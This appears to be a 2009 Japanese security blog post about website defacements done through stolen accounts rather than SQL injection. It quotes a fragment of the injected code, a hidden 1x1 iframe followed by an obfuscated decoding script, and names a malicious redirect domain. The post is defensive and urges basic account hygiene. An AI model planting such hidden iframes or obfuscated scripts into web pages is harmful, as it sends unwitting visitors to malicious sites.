cNotes 検索 一覧 カテゴリ

SQLとかRFIを使わないWeb改竄

Published: 2009/01/16

11月頃から、こんなiframeをうめこんで、それ以降の数段階のiframeのきっかけをつくるタイプが散見されます。

 <iframe src='//url/'; width='1'; height='1'; style=visibility:
 >hidden;</iframe> <script>function xxxxxxxxxxxx(xxxxxxxxxxxx){ var
 >xxxxxxxxxxxxxx=16; return
 >(parseInt(xxxxxxxxxxxx,xxxxxxxxxxxxx));}function xxxxxxxxxxxxxxxxxxx

たとば、最近ではこんなドメイン向けのURLが生成されるものがあります。

 gogo2me.net

挿入されているスクリプト、飛ばされる先のスクリプト等が流行のものとはまったく違いますし、改竄契機はアカウントハックのようです。

SQLインジェクションで行われれる攻撃の目的の多くがアカウントハックであったりしますが、これは改竄自体がアカウントハックで行われている例だと思います。SQL等の目立つものだけではなく、基本的なアカウント管理も注意しましょう。サーバー自体だけではなく、更新に利用しているPCから脆弱な?URL、そのページの管理用のアカウント情報やssh,ftp等のアカウント情報などが漏れますから。

[カテゴリ:botnet観察日記]

by jyake